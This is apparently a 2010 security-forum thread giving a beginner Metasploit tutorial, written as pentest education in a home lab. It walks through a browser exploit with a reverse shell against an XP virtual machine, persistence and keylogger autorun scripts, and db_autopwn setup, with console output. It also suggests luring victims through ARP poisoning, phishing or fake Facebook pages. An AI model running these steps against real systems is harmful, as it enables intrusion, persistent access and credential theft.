My Metasploit tutorial thread

[iproute]

For those beginners, much of this stuff can be found in some good resources I will cite later. Please leave comments on things you'd like to see inlcuded or corrections that may need to be made. Currently this post is a work in progress

This demonstration uses the new "windows/browser/ms10_xxx_ie_css_clip"
More info available from Exploit-db New IE6,7,8 mem corruption


Common msfconsole tasks;
first of course open a terminal and issue the command

Code:

root@bt:~#msfconsole

Then there are some basics like searching for exploits. A more detailed description of a given exploit from within the framework, selecting a payload, running the exploit, some of the simple automation that can be done, and other oddities. Here we will look for exploits that are 2010 microsoft security advisories.

Code:

search ms10

Next, maybe we want to know more about a given exploit; This information looks similar to what is found on the advisories and maybe even on Exploits Database by Offensive Security, but includes things like the options that can be set.

Code:

info windows/browser/ms10_xxx_ie_css_clip

now we will load up an exploit we'd like to try.

Code:

use windows/browser/ms10_xxx_ie_css_clip

We need to configure our exploit options for it to work of course. I like to select payloads first. Not all payloads work with all exploits. Too keep things simple the metasploit developers have designed the framework so that once you have selected the exploit you would like to use, if you issue the command below(show payloads) the framwork will only show the payloads that work for your selected exploit.

Code:

msf exploit(ms10_xxx_ie_css_clip) > show payloads

Remember the info command we used with exploits? Well it works with payloads too. Take some time to familiarize yourself with the payloads metasploit has to offer.

Code:

msf exploit(ms10_xxx_ie_css_clip) > info windows/shell/reverse_tcp

Lets go ahead and select a payload to use.

Code:

msf exploit(ms10_xxx_ie_css_clip) > set payload windows/shell/reverse_tcp

Now we need to configure our options. Lets take a look at what options we have.

Code:

msf exploit(ms10_xxx_ie_css_clip) > show options

ok, lets set things up!

Code:

msf exploit(ms10_xxx_ie_css_clip) > set lhost 192.168.1.105
msf exploit(ms10_xxx_ie_css_clip) > set lport 31337
msf exploit(ms10_xxx_ie_css_clip) > set uripath /
msf exploit(ms10_xxx_ie_css_clip) > set srvport 80

The uripath options sets the directory the malicious webserver will be located. Root directory keeps it simple. srvport sets the webserver port to 80, also making this vector simpler to perform. Please refer to other documentation for the other options such as the excellent
Metasploit Unleashed Information Security Training
Here is where you might want to include some automation or set some of the other features. To view advanced options available, issue the following command;

Code:

show advanced

A couple of interesting advanced options are AutoRunScript and InitialAutoRunScript.
Please refer to the section 10 (meterpreter scripting) of the MSF unleashed course for more information on which scripts are available.
Another way is to issue the follow command in your terminal(not in the framework console)

Code:

root@bt:~# ls /pentest/exploits/framework3/scripts/meterpreter/
arp_scanner.rb           enum_putty.rb            getcountermeasure.rb      multi_meter_inject.rb   remotewinenum.rb                 webcam.rb
autoroute.rb             enum_shares.rb           getgui.rb                 multicommand.rb         scheduleme.rb                    win32-sshclient.rb
checkvm.rb               enum_vmware.rb           gettelnet.rb              multiscript.rb          schtasksabuse.rb                 win32-sshserver.rb
credcollect.rb           event_manager.rb         getvncpw.rb               netenum.rb              scraper.rb                       winbf.rb
domain_list_gen.rb       file_collector.rb        hashdump.rb               packetrecorder.rb       screen_unlock.rb                 winenum.rb
dumplinks.rb             get_application_list.rb  hostsedit.rb              panda_2007_pavsrv51.rb  search_dwld.rb                   wmic.rb
duplicate.rb             get_env.rb               keylogrecorder.rb         persistence.rb          service_permissions_escalate.rb
enum_chrome.rb           get_filezilla_creds.rb   killav.rb                 pml_driver_config.rb    srt_webdrive_priv.rb
enum_firefox.rb          get_local_subnets.rb     metsvc.rb                 powerdump.rb            uploadexec.rb
enum_logged_on_users.rb  get_loggedon_users.rb    migrate.rb                prefetchtool.rb         virtualbox_sysenter_dos.rb
enum_powershell_env.rb   get_pidgin_creds.rb      multi_console_command.rb  process_memdump.rb      vnc.rb

The two autorunscript options allow your session to perform scripted tasks as soon as the session begins. Things like making a meterpreter session persistent, or beginning a keylogger immediately, migrating your session to another process, or even chaining multiple commands are possible. You'll want to do some studying and experimenting with what automation you find works for you.
Now we need to run our exploit. I like the -j option as it backgrounds the exploit process so you can continue to work in the framework console.

Code:

exploit -j

Now find a creative way to lure your victim to your malicious website in this case since the exploit we've selected here is a client side. You could use ARP poisoning or a phishing style attack with the link. Be inventive! I am just using a simple not updated windows XP SP3 machine running on my LAN in Virtualbox, so I will just browse there myself. In my victim's web-browser I simply entered my attackers IP

Code:

http://192.168.1.105/

Well we got a session!. Here is some output from my msfconsole

Code:

msf exploit(ms10_xxx_ie_css_clip) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.105:31337 
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.105:80/
[*] Server started.
msf exploit(ms10_xxx_ie_css_clip) >[*] Sending Internet Explorer CSS SetUserClip Memory Corruption to 192.168.1.147:1053 (target: Internet Explorer 6)...
[*] Sending stage (240 bytes) to 192.168.1.147
[*] Command shell session 1 opened (192.168.1.105:31337 -> 192.168.1.147:1055) at 2010-11-14 11:34:44 -0600
[*] Session ID 1 (192.168.1.105:31337 -> 192.168.1.147:1055) processing InitialAutoRunScript 'migrate -f'
[-] Error: Command shell sessions do not support migration

In this case we are using a simple reverse shell and not a meterpreter. The migration error is ok, as migrate is a meterpreter script. Some instances maybe you could only begin with a shell due to payload limitations an exploit has. No problem. Here is what I like to do

Turning windows shells into meterpreter sessions the easy way.
First, lets list our sessions. Then we'll take a look at the options the sessions command has, since there is one we like a lot.

Code:

msf exploit(ms10_xxx_ie_css_clip) > sessions

Active sessions
===============

  Id  Type   Information  Connection
  --  ----   -----------  ----------
  1   shell               192.168.1.105:31337 -> 192.168.1.147:1055

msf exploit(ms10_xxx_ie_css_clip) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions
    -c <opt>  Run a command on the session given with -i, or all
    -d <opt>  Detach an interactive session
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate session
    -l        List all active sessions
    -q        Quiet mode
    -s <opt>  Run a script on the session given with -i, or all
    -u <opt>  Upgrade a win32 shell to a meterpreter session
    -v        List verbose fields

that -u options is pretty sweet. Lets go ahead and upgrade our shell to a meterpreter. FYI, It did not work in this instance, possibly because the shell we are using is also a reverse connection. I will edit this thread later with the correct updates. Anyway the update a shell command is;

Code:

msf exploit(ms10_xxx_ie_css_clip) > sessions -u 1

EDIT: I didn't get the thread edited with the upgrade working, but I have made a video of using the spoolss exploit with a reverse shell payload, then upgraded that. I've also shown the makerc command, and the migrate meterpreter script. Migrate should be covered elsewhere and is a mostly simple concept. To understand when migrate is not simple, watch the megaprimer series.
Makerc is useful as it will generate a metasploit resource file(akin to a bash script for metasploit almost) of all the commands used in that session. Good automation tool. I will show using resource files later on, and they are also covered in the MSF unleashed course
m10_061_spoolss demo
...continued....

[iproute]

Now that we've "upgraded" lets discuss those meterpreter automations scripts briefly again.
To find out what syntax or features and options a script has you can use the run command, the script name, then the -h options. Here are some examples of a couple of the scripts I find useful

Code:

meterpreter > run persistence -h

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back


meterpreter > run win32-sshserver -h
OpenSSH-server deploy+run script
This script will deploy OpenSSH + run the SSH-server as a service

OPTIONS:

    -F        Force overwriting of registry-values
    -I <opt>  Install OpenSSH to the given directory
    -N <opt>  Set custom service name
    -S <opt>  Set custom service description
    -U <opt>  Download OpenSSH-SFX from given URL
    -f <opt>  The filename of the OpenSSH-SFX to deploy. (Default is to auto-download from meterpreter.illegalguy.hostzi.com
    -h        This help menu
    -m <opt>  Do not start the OpenSSH-service after installation
    -p <opt>  Password for the new user
    -r        Uninstall OpenSSH + delete added user (ATTENTION: will only uninstall OpenSSH-installations that were deployed by this script!!)
    -t <opt>  Set start-type of the service to manual (Default: auto)
    -u <opt>  Add windows-user (autoadded to local administrators

One handy feature is to set environment variables globally. This can be done with setg. Here is an example of setting meterpreter as the payload globally.

Code:

msf exploit(ms10_xxx_ie_css_clip) > setg payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

You can show all the globally set variables by using setg by itself.

Code:

msf exploit(ms10_xxx_ie_css_clip) > setg

Global
======

  Name           Value
  ----           -----
  AutoRunScript  keylogrecorder
  lhost          192.168.1.105
  lport          31337
  payload        windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_ie_css_clip) >

These can be unset using unsetg

Code:

msf exploit(ms10_xxx_ie_css_clip) > unsetg
Usage: unset var1 var2 var3 ...

The unset command is used to unset one or more variables.
To flush all entires, specify 'all' as the variable name
msf exploit(ms10_xxx_ie_css_clip) > unsetg all
Flushing datastore...
msf exploit(ms10_xxx_ie_css_clip) >

A very cool way I've found for using setg for the global variables is with the Social Engineering Toolkit.
Say you want to be quick and dirty as you have other tasks for this pentest. You've already compromised your client's wireless network using your ninja skills, so you set up a fake facebook with SET, using a java attack, and ARP poison some of the interesting workstations on said wireless network with dns spoof, and get a meterpreter session. Now as we said, you also have a lot of other work to do on this particular pentest. Well you can

Code:

msf > setg InitialAutoRunScript persistence
InitialAutoRunScript => persistence
msf > setg AutoRunScript keylogrecorder
AutoRunScript => keylogrecorder

And get sessions, that you can make sure you will keep, and even grab credentials for all kinds of things, while you're working on your reporting or doing some further research. The global variables I have tried with the social engineering toolkit have allowed me to further tweak it's capabilities and automation. Thanks rel1k for such great tools!


I will continue to add things to this thread as I go on.

I will update this thread a little later on with my favorite resource links for Metasploit education.
Hope this thread is useful to some of you, even though there is a lot of redundant metasploit info out there.


Links section
Metasploit class - Rel1k, purehate, nullthreat, and irongeek
Metasploit Megaprimer
MSF Unleashed

Vivek's Scanario based hacking series part 1
Vivek, SBH part 2a
Vivek, SBH part 3
Vivek, SBH part 4
Metasploit Wiki - There is some really good stuff here
One of the best HOWTO's on the forum right now involves improving the effectiveness of db_autopwn by our moderator sickness. I recommend it
http://www.backtrack-linux.org/forum...ostgresql.html
Carlos Perez, master of meterpreter scripts
RickRoll Meterpreter script - requires editing
I've linked in darkoperator's rickroll script as it's a good laugh and also can be useful for when you need to demonstrate something to management. Nice way to demonstrate taking control of a PC without having to get any sort of remote desktop or VNC session. The laugh will make it easier and you could even use a full screen video of it, also locking the keyboard and mouse are functions of the script, so it only stops when you say so.


More Videos from vivek on Assembly. Helps to understand what many of these exploits are actually doing.
Assembly Primer part 1
Assembly Primer part 2
Assembly Primer part 3
Assembly Primer part 4
Assembly Primer part 5
Assembly Primer part 6
Assembly Primer part 7
Assembly Primer part 8
Assembly Primer part 9
Assembly Primer part 10
Assembly Primer part 11





And one last thing.... The metasploit developers recommend updating your metasploit at least every couple of days. New exploits are released, quite often existing code is improved, or better yet we are seeing new meterpreter scripts all the time.

This can be done using

Code:

msfupdate

Hope everyone enjoys my post, please leave comments, and lets all take a moment to thank the giants on whose shoulders we stand (backtrack developers, MSF developers, and other community contributors)!

[grindcore]

Wow, this certainly looks like a great tutorial. Now going to have a read through, thanks for posting!

[skull2006]

thank you man

[iproute]

The Metasploit class I've referenced on irongeek I actually just found and began watching myself when writing this tut. So far my fav part is Adrian asking, "Ok, so how many people are using metasploit in linux....?" [raising of hands] "And how many people are using msf in windows?" "ok, Just you..."


Seriously though, the framework is generally much smoother in linux, but sometimes it really is handy to have it in windows.

From the first video there, one new thing Adrian and Dave brought to my attention was the "sessions -l -v". The -v switch shows what exploit was performed to get said session. Here is a scenario that demonstrates how useful that is. We're running a db_autopwn against a victim. We get a number of sessions but want to know what exploits were successful

Code:

[*] (50/50 [0 sessions]): Waiting on 23 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 21 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.25.133:30912 -> 192.168.25.147:1093) at 2010-11-15 03:48:22 -0600
[*] (50/50 [1 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.25.133:27629 -> 192.168.25.147:1094) at 2010-11-15 03:48:27 -0600
[*] (50/50 [2 sessions]): Waiting on 11 launched modules to finish execution...
[*] (50/50 [2 sessions]): Waiting on 8 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 8 launched modules to finish execution...
[*] Meterpreter session 3 opened (192.168.25.133:22206 -> 192.168.25.147:1096) at 2010-11-15 03:49:10 -0600
[*] Meterpreter session 4 opened (192.168.25.133:15119 -> 192.168.25.147:1097) at 2010-11-15 03:49:10 -0600
[*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [4 sessions]): Waiting on 6 launched modules to finish execution...

msf > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:30912 -> 192.168.25.147:1093
  2   meterpreter x86/win32                                         192.168.25.133:27629 -> 192.168.25.147:1094
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:22206 -> 192.168.25.147:1096
  4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:15119 -> 192.168.25.147:1097

msf > sessions -v

Active sessions
===============

  Id  Type                   Information                            Connection                                   Via
  --  ----                   -----------                            ----------                                   ---
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:30912 -> 192.168.25.147:1093  exploit/windows/smb/ms08_067_netapi
  2   meterpreter x86/win32                                         192.168.25.133:27629 -> 192.168.25.147:1094  exploit/windows/smb/ms08_067_netapi
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:22206 -> 192.168.25.147:1096  exploit/windows/smb/ms10_061_spoolss
  4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ VICTIM-30FE648F  192.168.25.133:15119 -> 192.168.25.147:1097  exploit/windows/smb/ms10_061_spoolss

Bear in mind the IPs used in the above scenario a different from the beginning of the post. Just an isolated subnet for my virtual machines.


Some more commands I don't frequently see used in some of the other resources around.

First the makerc command is handy for making a resource file from the session you've just run. I'll get some information on using resource files in here also, but there is some information found in the MSFunleashed course.

Code:

msf exploit(ms10_061_spoolss) > makerc
Usage: makerc <output rc file>

Save the commands executed since startup to the specified file.
msf exploit(ms10_061_spoolss) > makerc spoolss-test.rc
[*] Saving last 21 commands to spoolss-test.rc ...

[skull2006]

THANK YOU AGAIN AND I WANT ADD THIS TUT :
Download videos from securitytube.net
Method 1 :
———
Viewing the source of the page in which the video is being played, and searching for “.mp4″ gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use firefox, and i used the download manager which came with the addon named “DownThemAll!” for this purpose.

Method 2 :
———
In case you are using linux, then the videos get buffered into the /tmp directory. Mostly, they`ll begin with the name “Flash” to be followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

Hope this helps!!! ;-)

[iproute]

THANK YOU AGAIN AND I WANT ADD THIS TUT :
Download videos from securitytube.net
Method 1 :
———
Viewing the source of the page in which the video is being played, and searching for “.mp4″ gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use firefox, and i used the download manager which came with the addon named “DownThemAll!” for this purpose.

Method 2 :
———
In case you are using linux, then the videos get buffered into the /tmp directory. Mostly, they`ll begin with the name “Flash” to be followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

Hope this helps!!! ;-)

Appreciate the tip! There are a lot of videos references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his xbox media center so he can use his epic size projector.

I like to use Ant Video Downloader with embedded FLV Player
which is a firefox plugin, with a player included so you don't need to go searching for where the heck it put those flv files(because where is does is somewhat of a long path sometimes).

[skull2006]

Appreciate the tip! There are a lot of videos references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his xbox media center so he can use his epic size projector.

I like to use Ant Video Downloader with embedded FLV Player
which is a firefox plugin, with a player included so you don't need to go searching for where the heck it put those flv files(because where is does is somewhat of a long path sometimes).

thank you for that too..........
And what about other SBH if the victim have AV,firewall,Patched.
May you can give us an Idea for that?

Best regards,

[iproute]

And what about other SBH if the victim have AV,firewall,Patched.
May you can give us an Idea for that?

I'll give some info on my take on it in another post when I've got more time, but I'm definitey not an expert. Might be good to get in touch with vivek and find out if there are any further presentations planned. From elsewhere on the internet it looks like he is pretty good about responding.



On another note, one of the things I feel I've missed above links wise is
IHS*|*Home of Johnny Long and Hackers for Charity, Inc
Please at least take a look at some of the cool stuff Johnny Long is doing.

[iproute]

I've decided to add a section on using db_autopwn, just too add to completeness and content. Please spend some time with the resources I've included in the links section as well. db_autopwn is a very handy tool to get some work done quickly, however using exploits individually can often be more effective as well as quieter/stealthier. Also, please configure you're postgresql database, as many of us have pointed out quite a number of times that sqlite3 has issues or is not as reliable as postgres for using db_autopwn. Visit sickn3ss' thread listed in the links section for information on configuring postgresql for this use.
Below is setting the driver, and confirming it is set to what you need

Code:

root@bt:~# msfconsole
msf > db_driver postgresql
[*] Using database driver postgresql
msf > db_driver 
[*]    Active Driver: postgresql
[*]        Available: postgresql, sqlite3

[*]    DB Support: Enable the mysql driver with the following command:
[*]                 $ gem install mysql
[*]     This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*]                 $ sudo apt-get install libmysqlclient-dev

This is what will be output if you have not yet used postgres for this(i.e. have not created the database. In this case we are creating the database 'db_autopwn')
Anyway, here is the command to connect

Code:

msf > db_connect postgres:mypassword@127.0.0.1/db_autopwn
NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE:  CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE:  CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
NOTICE:  CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
NOTICE:  CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
NOTICE:  CREATE TABLE will create implicit sequence "notes_id_seq" for serial column "notes.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "notes_pkey" for table "notes"
NOTICE:  CREATE TABLE will create implicit sequence "wmap_targets_id_seq" for serial column "wmap_targets.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_targets_pkey" for table "wmap_targets"
NOTICE:  CREATE TABLE will create implicit sequence "wmap_requests_id_seq" for serial column "wmap_requests.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_requests_pkey" for table "wmap_requests"
NOTICE:  CREATE TABLE will create implicit sequence "workspaces_id_seq" for serial column "workspaces.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "workspaces_pkey" for table "workspaces"
NOTICE:  CREATE TABLE will create implicit sequence "events_id_seq" for serial column "events.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "events_pkey" for table "events"
NOTICE:  CREATE TABLE will create implicit sequence "loots_id_seq" for serial column "loots.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "loots_pkey" for table "loots"
NOTICE:  CREATE TABLE will create implicit sequence "users_id_seq" for serial column "users.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "users_pkey" for table "users"
NOTICE:  CREATE TABLE will create implicit sequence "reports_id_seq" for serial column "reports.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "reports_pkey" for table "reports"
NOTICE:  CREATE TABLE will create implicit sequence "tasks_id_seq" for serial column "tasks.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tasks_pkey" for table "tasks"
NOTICE:  CREATE TABLE will create implicit sequence "creds_id_seq" for serial column "creds.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "creds_pkey" for table "creds"
NOTICE:  CREATE TABLE will create implicit sequence "exploited_hosts_id_seq" for serial column "exploited_hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploited_hosts_pkey" for table "exploited_hosts"
NOTICE:  CREATE TABLE will create implicit sequence "report_templates_id_seq" for serial column "report_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "report_templates_pkey" for table "report_templates"
NOTICE:  CREATE TABLE will create implicit sequence "campaigns_id_seq" for serial column "campaigns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "campaigns_pkey" for table "campaigns"
NOTICE:  CREATE TABLE will create implicit sequence "email_templates_id_seq" for serial column "email_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_templates_pkey" for table "email_templates"
NOTICE:  CREATE TABLE will create implicit sequence "attachments_id_seq" for serial column "attachments.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "attachments_pkey" for table "attachments"
NOTICE:  CREATE TABLE will create implicit sequence "email_addresses_id_seq" for serial column "email_addresses.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_addresses_pkey" for table "email_addresses"
NOTICE:  CREATE TABLE will create implicit sequence "web_templates_id_seq" for serial column "web_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_templates_pkey" for table "web_templates"
NOTICE:  CREATE TABLE will create implicit sequence "web_sites_id_seq" for serial column "web_sites.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_sites_pkey" for table "web_sites"
NOTICE:  CREATE TABLE will create implicit sequence "web_pages_id_seq" for serial column "web_pages.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_pages_pkey" for table "web_pages"
NOTICE:  CREATE TABLE will create implicit sequence "web_forms_id_seq" for serial column "web_forms.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_forms_pkey" for table "web_forms"
NOTICE:  CREATE TABLE will create implicit sequence "web_vulns_id_seq" for serial column "web_vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_vulns_pkey" for table "web_vulns"
NOTICE:  CREATE TABLE will create implicit sequence "imported_creds_id_seq" for serial column "imported_creds.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "imported_creds_pkey" for table "imported_creds"

Next, I like to verify the status of the connection. If you are not creating a new database and are connecting to an existing one, it may be a good idea to see if you've left anything in it. Here's the example

Code:

msf > db_status 
[*] postgresql connected to db_autopwn
msf > db_hosts 

Hosts
=====

address  address6  arch  comm  comments  created_at  info  mac  name  os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at  svcs  vulns  workspace
-------  --------  ----  ----  --------  ----------  ----  ---  ----  ---------  -------  -------  -----  -------  -----  ----------  ----  -----  ---------

I like to clean my output on db_hosts, as the nmap string I like to use for quick doesn't fill a number of the fields. Here's how.

Code:

msf > db_hosts -h
Usage: db_hosts [-h|--help] [-u|--up] [-a <addr1,addr2>] [-c <column1,column2>] [-o output-file ]

  -a <addr1,addr2>  Search for a list of addresses
  -c <col1,col2>    Only show the given columns
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in csv format

Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at 

msf > db_hosts -c address,mac,name,state,updated_at,svcs,vulns

Hosts
=====

address  mac  name  state  updated_at  svcs  vulns
-------  ---  ----  -----  ----------  ----  -----

In the example above, there is nothing in the database. Entries can be added or otherwise manipulated manually with commands such as "db_add_host, db_add_port, db_del_host,etc." Of course nmap is a much simpler way of populating your database. Right now we are just going to add an individual host in with db_nmap, but you can certainly scan in a subnet instead.


...continues...